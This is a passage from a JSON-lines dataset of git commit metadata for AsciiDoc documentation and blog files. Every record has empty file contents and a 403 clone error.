Ansh90\/elasticsearch,Rygbee\/elasticsearch,kingaj\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,cnfire\/elasticsearch-1,girirajsharma\/elasticsearch,markwalkom\/elasticsearch,kingaj\/elasticsearch,petabytedata\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,bestwpw\/elasticsearch,dpursehouse\/elasticsearch,onegambler\/elasticsearch,kingaj\/elasticsearch,AndreKR\/elasticsearch,MichaelLiZhou\/elasticsearch,cwurm\/elasticsearch,awislowski\/elasticsearch,Shepard1212\/elasticsearch,C-Bish\/elasticsearch,himanshuag\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,wimvds\/elasticsearch,C-Bish\/elasticsearch,petabytedata\/elasticsearch,schonfeld\/elasticsearch,jimczi\/elasticsearch,vroyer\/elassandra,lmtwga\/elasticsearch,zhiqinghuang\/elasticsearch,kalimatas\/elasticsearch,weipinghe\/elasticsearch,franklanganke\/elasticsearch,episerver\/elasticsearch,adrianbk\/elasticsearch,geidies\/elasticsearch,spiegela\/elasticsearch,ulkas\/elasticsearch,yanjunh\/elasticsearch,lmtwga\/elasticsearch,ricardocerq\/elasticsearch,trangvh\/elasticsearch,nrkkalyan\/elasticsearch,onegambler\/elasticsearch,ivansun1010\/elasticsearch,shreejay\/elasticsearch,ESamir\/elasticsearch,scorpionvicky\/elasticsearch,mmaracic\/elasticsearch,nknize\/elasticsearch,iacdingping\/elasticsearch,girirajsharma\/elasticsearch,huanzhong\/elasticsearch,ivansun1010\/elasticsearch,s1monw\/elasticsearch,knight1128\/elasticsearch,umeshdangat\/elasticsearch,wittyameta\/elasticsearch,mgalushka\/elasticsearch,GlenRSmith\/elasticsearch,naveenhooda2000\/elasticsearch,vietlq\/elasticsearch,wittyameta\/elasticsearch,mohit\/elasticsearch,caengcjd\/elasticsearch,rhoml\/elasticsearch,mgalushka\/elasticsearch,GlenRSmith\/elasticsearch,JervyShi\/elasticsearch,dpursehouse\/elasticsearch,tebriel\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,franklanganke\/elasticsearch,qwerty4030\/elasticsearch,ckclark\/elasticsearch,wangtuo\/elasticsearch,tahaemin\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,dongjoon-hyun\/elasticsearch,YosuaMichael\/elasticsearch,awislowski\/elasticsearch,i-am-Nathan\/elasticsearch,zhiqinghuang\/elasticsearch,jeteve\/elasticsearch,socialrank\/elasticsearch,ZTE-PaaS\/elasticsearch,MaineC\/elasticsearch,Uiho\/elasticsearch,umeshdangat\/elasticsearch,F0lha\/elasticsearch,18098924759\/elasticsearch,liweinan0423\/elasticsearch,jango2015\/elasticsearch,lydonchandra\/elasticsearch,xuzha\/elasticsearch,mapr\/elasticsearch,HonzaKral\/elasticsearch,palecur\/elasticsearch,jpountz\/elasticsearch,nknize\/elasticsearch,wbowling\/elasticsearch,a2lin\/elasticsearch,trangvh\/elasticsearch,mapr\/elasticsearch,spiegela\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ouyangkongtong\/elasticsearch,tebriel\/elasticsearch,cnfire\/elasticsearch-1,i-am-Nathan\/elasticsearch,lmtwga\/elasticsearch,xingguang2013\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,YosuaMichael\/elasticsearch,lzo\/elasticsearch-1,drewr\/elasticsearch,LeoYao\/elasticsearch,coding0011\/elasticsearch,myelin\/elasticsearch,caengcjd\/elasticsearch,winstonewert\/elasticsearch,ulkas\/elasticsearch,markharwood\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,tahaemin\/elasticsearch,mm0\/elasticsearch,jchampion\/elasticsearch,clintongormley\/elasticsearch,jbertouch\/elasticsearch,Charlesdong\/elasticsearch,onegambler\/elasticsearch,andrejserafim\/elasticsearch,zhiqinghuang\/elasticsearch,ricardocerq\/elasticsearch,kalburgimanjunath\/elasticsearch,tebriel\/elasticsearch,mcku\/elasticsearch,schonfeld\/elasticsearch,JSCooke\/elasticsearch,palecur\/elasticsearch,lks21c\/elasticsearch,karthikjaps\/elasticsearch,elancom\/elasticsearch,wenpos\/elasticsearch,IanvsPoplicola\/elasticsearch,snikch\/elasticsearch,yanjunh\/elasticsearch,avikurapati\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,achow\/elasticsearch,infusionsoft\/elasticsearch,socialrank\/elasticsearch,winstonewert\/elasticsearch,pranavraman\/elasticsearch,zhiqinghuang\/elasticsearch,myelin\/elasticsearch,robin13\/elasticsearch,rhoml\/elasticsearch,HonzaKral\/elasticsearch,cnfire\/elasticsearch-1,ulkas\/elasticsearch,adrianbk\/elasticsearch,ricardocerq\/elasticsearch,knight1128\/elasticsearch,iacdingping\/elasticsearch,yanjunh\/elasticsearch,cnfire\/elasticsearch-1,kaneshin\/elasticsearch,lzo\/elasticsearch-1,nilabhsagar\/elasticsearch,sdauletau\/elasticsearch,JackyMai\/elasticsearch,vietlq\/elasticsearch,Rygbee\/elasticsearch,mikemccand\/elasticsearch,vietlq\/elasticsearch,tebriel\/elasticsearch,gfyoung\/elasticsearch,rhoml\/elasticsearch,ESamir\/elasticsearch,pranavraman\/elasticsearch,davidvgalbraith\/elasticsearch,achow\/elasticsearch,Uiho\/elasticsearch,rento19962\/elasticsearch,nezirus\/elasticsearch,xingguang2013\/elasticsearch,martinstuga\/elasticsearch,zhiqinghuang\/elasticsearch,huanzhong\/elasticsearch,himanshuag\/elasticsearch,episerver\/elasticsearch,himanshuag\/elasticsearch,naveenhooda2000\/elasticsearch,Ansh90\/elasticsearch,markharwood\/elasticsearch,avikurapati\/elasticsearch,nknize\/elasticsearch,karthikjaps\/elasticsearch,infusionsoft\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,ckclark\/elasticsearch,nellicus\/elasticsearch,coding0011\/elasticsearch,dpursehouse\/elasticsearch,wuranbo\/elasticsearch,18098924759\/elasticsearch,knight1128\/elasticsearch,alexshadow007\/elasticsearch,Charlesdong\/elasticsearch,springning\/elasticsearch,weipinghe\/elasticsearch,tahaemin\/elasticsearch,bestwpw\/elasticsearch,yongminxia\/elasticsearch,F0lha\/elasticsearch,iacdingping\/elasticsearch,sdauletau\/elasticsearch,18098924759\/elasticsearch,infusionsoft\/elasticsearch,Ansh90\/elasticsearch,trangvh\/elasticsearch,PhaedrusTheGreek\/elasticsearch,schonfeld\/elasticsearch,schonfeld\/elasticsearch,Charlesdong\/elasticsearch,nellicus\/elasticsearch,nrkkalyan\/elasticsearch,mmaracic\/elasticsearch,kalburgimanjunath\/elasticsearch,sc0ttkclark\/elasticsearch,kingaj\/elasticsearch,wbowling\/elasticsearch,MaineC\/elasticsearch,drewr\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,nomoa\/elasticsearch,jpountz\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,jprante\/elasticsearch,markwalkom\/elasticsearch,Collaborne\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,zkidkid\/elasticsearch,masterweb121\/elasticsearch,wimvds\/elasticsearch,himanshuag\/elasticsearch,xuzha\/elasticsearch,qwerty4030\/elasticsearch,achow\/elasticsearch,lzo\/elasticsearch-1,fforbeck\/elasticsearch,wittyameta\/elasticsearch,avikurapati\/elasticsearch,gfyoung\/elasticsearch,andrestc\/elasticsearch,pranavraman\/elasticsearch,robin13\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,JSCooke\/elasticsearch,Shepard1212\/elasticsearch,iacdingping\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,ZTE-PaaS\/elasticsearch,karthikjaps\/elasticsearch,nrkkalyan\/elasticsearch,rento19962\/elasticsearch,spiegela\/elasticsearch,rento19962\/elasticsearch,wbowling\/elasticsearch,rajanm\/elasticsearch,adrianbk\/elasticsearch,clintongormley\/elasticsearch,rento19962\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,polyfractal\/elasticsearch,YosuaMichael\/elasticsearch,mnylen\/elasticsearch,hafkensite\/elasticsearch,kunallimaye\/elasticsearch,elancom\/elasticsearch,wimvds\/elasticsearch,wittyameta\/elasticsearch,Shepard1212\/elasticsearch,myelin\/elasticsearch,ckclark\/elasticsearch,sdauletau\/elasticsearch,wbowling\/elasticsearch,mnylen\/elasticsearch,palecur\/elasticsearch,masaruh\/elasticsearch,sreeramjayan\/elasticsearch,springning\/elasticsearch,diendt\/elasticsearch,martinstuga\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,ouyangkongtong\/elasticsearch,uschindler\/elasticsearch,rmuir\/elasticsearch,lydonchandra\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,KimTaehee\/elasticsearch,jango2015\/elasticsearch,MetSystem\/elasticsearch,18098924759\/elasticsearch,infusionsoft\/elasticsearch,sdauletau\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,drewr\/elasticsearch,pranavraman\/elasticsearch,cwurm\/elasticsearch,girirajsharma\/elasticsearch,mcku\/elasticsearch,ESamir\/elasticsearch,wimvds\/elasticsearch,yongminxia\/elasticsearch,AndreKR\/elasticsearch,tahaemin\/elasticsearch,springning\/elasticsearch,mnylen\/elasticsearch,elancom\/elasticsearch,glefloch\/elasticsearch,tahaemin\/elasticsearch,mnylen\/elasticsearch,nellicus\/elasticsearch,artnowo\/elasticsearch,andrestc\/elasticsearch,IanvsPoplicola\/elasticsearch,kalburgimanjunath\/elasticsearch,wenpos\/elasticsearch,HonzaKral\/elasticsearch,jbertouch\/elasticsearch,coding0011\/elasticsearch,nomoa\/elasticsearch,wimvds\/elasticsearch,LewayneNaidoo\/elasticsearch,jchampion\/elasticsearch,xuzha\/elasticsearch,wenpos\/elasticsearch,jimczi\/elasticsearch,springning\/elasticsearch,zhiqinghuang\/elasticsearch,ivansun1010\/elasticsearch,yynil\/elasticsearch,rajanm\/elasticsearch,ulkas\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,kalburgimanjunath\/elasticsearch,petabytedata\/elasticsearch,Collaborne\/elasticsearch,lmtwga\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,huanzhong\/elasticsearch,jchampion\/elasticsearch,Rygbee\/elasticsearch,LewayneNaidoo\/elasticsearch,Rygbee\/elasticsearch,iacdingping\/elasticsearch,bestwpw\/elasticsearch,mnylen\/elasticsearch,s1monw\/elasticsearch,jango2015\/elasticsearch,shreejay\/elasticsearch,huanzhong\/elasticsearch,gingerwizard\/elasticsearch,cwurm\/elasticsearch,mjason3\/elasticsearch,pranavraman\/elasticsearch,JSCooke\/elasticsearch,socialrank\/elasticsearch,caengcjd\/elasticsearch,YosuaMichael\/elasticsearch,drewr\/elasticsearch,rento19962\/elasticsearch,mgalushka\/elasticsearch,ckclark\/elasticsearch,lydonchandra\/elasticsearch,fforbeck\/elasticsearch,F0lha\/elasticsearch,wittyameta\/elasticsearch,alexshadow007\/elasticsearch,tahaemin\/elasticsearch,bestwpw\/elasticsearch,sneivandt\/elasticsearch,wittyameta\/elasticsearch,markharwood\/elasticsearch,MetSystem\/elasticsearch,maddin2016\/elasticsearch,nellicus\/elasticsearch,yynil\/elasticsearch,martinstuga\/elasticsearch,nazarewk\/elasticsearch,adrianbk\/elasticsearch,lzo\/elasticsearch-1,jbertouch\/elasticsearch,wimvds\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,Rygbee\/elasticsearch,clintongormley\/elasticsearch,kingaj\/elasticsearch,weipinghe\/elasticsearch,bawse\/elasticsearch,mgalushka\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra5-rc,camilojd\/elasticsearch,18098924759\/elasticsearch,snikch\/elasticsearch,JervyShi\/elasticsearch,Collaborne\/elasticsearch,petabytedata\/elasticsearch,martinstuga\/elasticsearch,markwalkom\/elasticsearch,PhaedrusTheGreek\/elasticsearch,JervyShi\/elasticsearch,JackyMai\/elasticsearch,ESamir\/elasticsearch,fred84\/elasticsearch,mgalushka\/elasticsearch,HonzaKral\/elasticsearch,mapr\/elasticsearch,shreejay\/elasticsearch,cnfire\/elasticsearch-1,SaiprasadKrishnamurthy\/elasticsearch,schonfeld\/elasticsearch,andrejserafim\/elasticsearch,sreeramjayan\/elasticsearch,i-am-Nathan\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,wbowling\/elasticsearch,Uiho\/elasticsearch,caengcjd\/elasticsearch,btiernay\/elasticsearch,karthikjaps\/elasticsearch,yongminxia\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra5-rc,pozhidaevak\/elasticsearch,umeshdangat\/elasticsearch,himanshuag\/elasticsearch,jchampion\/elasticsearch,jpountz\/elasticsearch,trangvh\/elasticsearch,alexshadow007\/elasticsearch,wangtuo\/elasticsearch,artnowo\/elasticsearch,avikurapati\/elasticsearch,elasticdog\/elasticsearch,kunallimaye\/elasticsearch,andrestc\/elasticsearch,vroyer\/elasticassandra,JervyShi\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra,brandonkearby\/elasticsearch,rajanm\/elasticsearch,onegambler\/elasticsearch,zkidkid\/elasticsearch,areek\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kalburgimanjunath\/elasticsearch,C-Bish\/elasticsearch,mapr\/elasticsearch,karthikjaps\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,artnowo\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,pozhidaevak\/elasticsearch,huanzhong\/elasticsearch,gmarz\/elasticsearch,Helen-Zhao\/elasticsearch,nrkkalyan\/elasticsearch,awislowski\/elasticsearch,mortonsykes\/elasticsearch,Helen-Zhao\/elasticsearch,maddin2016\/elasticsearch,dpursehouse\/elasticsearch,obourgain\/elasticsearch,infusionsoft\/elasticsearch,xingguang2013\/elasticsearch,mortonsykes\/elasticsearch,bawse\/elasticsearch,mm0\/elasticsearch,gingerwizard\/elasticsearch,Ansh90\/elasticsearch,nellicus\/elasticsearch,Shepard1212\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,mmaracic\/elasticsearch,lmtwga\/elasticsearch,schonfeld\/elasticsearch,weipinghe\/elasticsearch,Stacey-Gammon\/elasticsearch,bestwpw\/elasticsearch,socialrank\/elasticsearch,Shepard1212\/elasticsearch,mbrukman\/elasticsearch,mortonsykes\/elasticsearch,dpursehouse\/elasticsearch,wuranbo\/elasticsearch,achow\/elasticsearch,davidvgalbraith\/elasticsearch,achow\/elasticsearch,ouyangkongtong\/elasticsearch,drewr\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,mm0\/elasticsearch,nezirus\/elasticsearch,snikch\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,diendt\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,jeteve\/elasticsearch,vroyer\/elassandra,polyfractal\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markharwood\/elasticsearch,nomoa\/elasticsearch,yongminxia\/elasticsearch,ZTE-PaaS\/elasticsearch,mcku\/elasticsearch,weipinghe\/elasticsearch,ckclark\/elasticsearch,adrianbk\/elasticsearch,MichaelLiZhou\/elasticsearch,sneivandt\/elasticsearch,MetSystem\/elasticsearch,sc0ttkclark\/elasticsearch,strapdata\/elassandra5-rc,a2lin\/elasticsearch,knight1128\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,davidvgalbraith\/elasticsearch,elancom\/elasticsearch,huanzhong\/elasticsearch,dongjoon-hyun\/elasticsearch,knight1128\/elasticsearch,Charlesdong\/elasticsearch,palecur\/elasticsearch,girirajsharma\/elasticsearch,polyfractal\/elasticsearch,karthikjaps\/elasticsearch,LeoYao\/elasticsearch,mikemccand\/elasticsearch,diendt\/elasticsearch,qwerty4030\/elasticsearch,hafkensite\/elasticsearch,wimvds\/elasticsearch,bawse\/elasticsearch,F0lha\/elasticsearch,diendt\/elasticsearch,gmarz\/elasticsearch,snikch\/elasticsearch,vietlq\/elasticsearch,btiernay\/elasticsearch,kingaj\/elasticsearch,yongminxia\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wangtuo\/elasticsearch,rmuir\/elasticsearch,jango2015\/elasticsearch,nrkkalyan\/elasticsearch,lzo\/elasticsearch-1,glefloch\/elasticsearch,huanzhong\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,kaneshin\/elasticsearch,onegambler\/elasticsearch,lmtwga\/elasticsearch,gmarz\/elasticsearch,polyfractal\/elasticsearch,mikemccand\/elasticsearch,polyfractal\/elasticsearch,mnylen\/elasticsearch,camilojd\/elasticsearch,kunallimaye\/elasticsearch,glefloch\/elasticsearch,MisterAndersen\/elasticsearch,nknize\/elasticsearch,mm0\/elasticsearch,mapr\/elasticsearch,areek\/elasticsearch,elancom\/elasticsearch,ESamir\/elasticsearch,wuranbo\/elasticsearch,kalburgimanjunath\/elasticsearch,mm0\/elasticsearch,areek\/elasticsearch,tahaemin\/elasticsearch,rento19962\/elasticsearch,lmtwga\/elasticsearch,onegambler\/elasticsearch,elasticdog\/elasticsearch,liweinan0423\/elasticsearch,masaruh\/elasticsearch,henakamaMSFT\/elasticsearch,davidvgalbraith\/elasticsearch,StefanGor\/elasticsearch,infusionsoft\/elasticsearch,rlugojr\/elasticsearch,zkidkid\/elasticsearch,ouyangkongtong\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,yongminxia\/elasticsearch,markharwood\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,springning\/elasticsearch,btiernay\/elasticsearch,pranavraman\/elasticsearch,obourgain\/elasticsearch,jprante\/elasticsearch,rmuir\/elasticsearch,nilabhsagar\/elasticsearch,lydonchandra\/elasticsearch,gmarz\/elasticsearch,geidies\/elasticsearch,nrkkalyan\/elasticsearch,naveenhooda2000\/elasticsearch,myelin\/elasticsearch,glefloch\/elasticsearch,scorpionvicky\/elasticsearch,iacdingping\/elasticsearch,kaneshin\/elasticsearch,JSCooke\/elasticsearch,episerver\/elasticsearch,jeteve\/elasticsearch,mcku\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,KimTaehee\/elasticsearch,fernandozhu\/elasticsearch,btiernay\/elasticsearch,KimTaehee\/elasticsearch,qwerty4030\/elasticsearch,mikemccand\/elasticsearch,mgalushka\/elasticsearch,jpountz\/elasticsearch,kunallimaye\/elasticsearch","old_file":"docs\/reference\/testing\/testing-framework.asciidoc","new_file":"docs\/reference\/testing\/testing-framework.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec6210d28bbc3d15fb9e8dd15b8fa56f177fd7bd","subject":"Update 2016-11-05-About-the-Author.adoc","message":"Update 2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"421f78556dbc87f3b9e914ece23b43ab1cb32614","subject":"Update 2017-07-26-ALGO-First-Setup.adoc","message":"Update 2017-07-26-ALGO-First-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-26-ALGO-First-Setup.adoc","new_file":"_posts\/2017-07-26-ALGO-First-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0be8566dd7b40ebd8d463e948c920accde174679","subject":"Add interfacing.asciidoc describing how to interact with external programs","message":"Add interfacing.asciidoc describing how to interact with external programs\n","repos":"elegios\/kakoune,elegios\/kakoune,alexherbo2\/kakoune,rstacruz\/kakoune,danielma\/kakoune,Asenar\/kakoune,rstacruz\/kakoune,alpha123\/kakoune,occivink\/kakoune,occivink\/kakoune,casimir\/kakoune,jjthrash\/kakoune,lenormf\/kakoune,alpha123\/kakoune,Asenar\/kakoune,lenormf\/kakoune,danielma\/kakoune,ekie\/kakoune,flavius\/kakoune,Somasis\/kakoune,danr\/kakoune,ekie\/kakoune,flavius\/kakoune,mawww\/kakoune,flavius\/kakoune,jkonecny12\/kakoune,jjthrash\/kakoune,casimir\/kakoune,jjthrash\/kakoune,casimir\/kakoune,jkonecny12\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,danr\/kakoune,zakgreant\/kakoune,occivink\/kakoune,xificurC\/kakoune,casimir\/kakoune,zakgreant\/kakoune,zakgreant\/kakoune,rstacruz\/kakoune,xificurC\/kakoune,mawww\/kakoune,ekie\/kakoune,lenormf\/kakoune,Somasis\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,elegios\/kakoune,danr\/kakoune,lenormf\/kakoune,Asenar\/kakoune,danr\/kakoune,Asenar\/kakoune,alexherbo2\/kakoune,zakgreant\/kakoune,elegios\/kakoune,rstacruz\/kakoune,danielma\/kakoune,flavius\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,occivink\/kakoune,ekie\/kakoune,xificurC\/kakoune,danielma\/kakoune,alpha123\/kakoune,Somasis\/kakoune,Somasis\/kakoune","old_file":"doc\/interfacing.asciidoc","new_file":"doc\/interfacing.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"573fe6bed9ba5f9b0fddd36796cc6937a40377c5","subject":"y2b create post Has Your Drink Been Tampered With?","message":"y2b create post Has Your Drink Been Tampered With?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-04-Has-Your-Drink-Been-Tampered-With.adoc","new_file":"_posts\/2017-08-04-Has-Your-Drink-Been-Tampered-With.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8be2a43d527687e7568dc86fee6b11bee994c5e9","subject":"Rename SystemArchitecture aspect to CommonPointcuts in AOP ref doc","message":"Rename SystemArchitecture aspect to CommonPointcuts in AOP ref doc\n\nSee gh-25357\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f67a8be16052353afb2032104d31e2d4796b61e","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/pages\/now.adoc","new_file":"content\/pages\/now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"26ccdd2eea24660f5c25e71ff58320d65899b44a","subject":"guide for jbang integration","message":"guide for jbang integration\n\nCo-authored-by: George Gastaldi <94a145309f176a79f8cd943f168fb7aaebdbfc96@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d449278d65663daf42d49f0ca56ba94321a23507","subject":"y2b create post 11\\","message":"y2b create post 11\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-15-11.adoc","new_file":"_posts\/2011-04-15-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0dedf8329196e1c9e6061621be24f0e4f6d4ddb","subject":"added principle","message":"added principle\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/principle.adoc","new_file":"doc\/MML4\/principle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d5b9886b4ba2cc77997a291960d3faeb7b7e716","subject":"client manual setup and API documentation","message":"client manual setup and API documentation\n","repos":"advancedtelematic\/rvi_sota_client,PDXostc\/rvi_sota_client,PDXostc\/rvi_sota_client,advancedtelematic\/rvi_sota_client","old_file":"docs\/client-guide.adoc","new_file":"docs\/client-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PDXostc\/rvi_sota_client.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"d4a919effe9525bae3b3614791d7b28cdd5e7416","subject":"Update 2015-11-12-Tableau-Spark-Cassandra.adoc","message":"Update 2015-11-12-Tableau-Spark-Cassandra.adoc","repos":"victorcouste\/blog,victorcouste\/blog,victorcouste\/blog","old_file":"_posts\/2015-11-12-Tableau-Spark-Cassandra.adoc","new_file":"_posts\/2015-11-12-Tableau-Spark-Cassandra.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/victorcouste\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9574f559f0f1927f42a5391e193fc5321553547d","subject":"Update 2018-01-10-Neo4j-Commercial-Prices.adoc","message":"Update 2018-01-10-Neo4j-Commercial-Prices.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca8b8d7e66ae9dd95621a184b39fd3f2fc890f82","subject":"Update 2015-08-31-APISpark-and-Google-Sheets.adoc","message":"Update 2015-08-31-APISpark-and-Google-Sheets.adoc","repos":"codetricity\/journey,codetricity\/journey,codetricity\/journey","old_file":"_posts\/2015-08-31-APISpark-and-Google-Sheets.adoc","new_file":"_posts\/2015-08-31-APISpark-and-Google-Sheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codetricity\/journey.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"958b6fe28061989ef135176d5b4db5e57d0a1ff6","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98685eb5c8cef58ef16598505c7b4c711768f2ed","subject":"Update 2017-10-11-use-storage-service-safely.adoc","message":"Update 2017-10-11-use-storage-service-safely.adoc","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee53d5b43683de5be1cf676c55f082a8ddcf9ccb","subject":"Rough draft of new HSM provisioning doc.","message":"Rough draft of new HSM provisioning doc.\n\nIt's basically the same as the 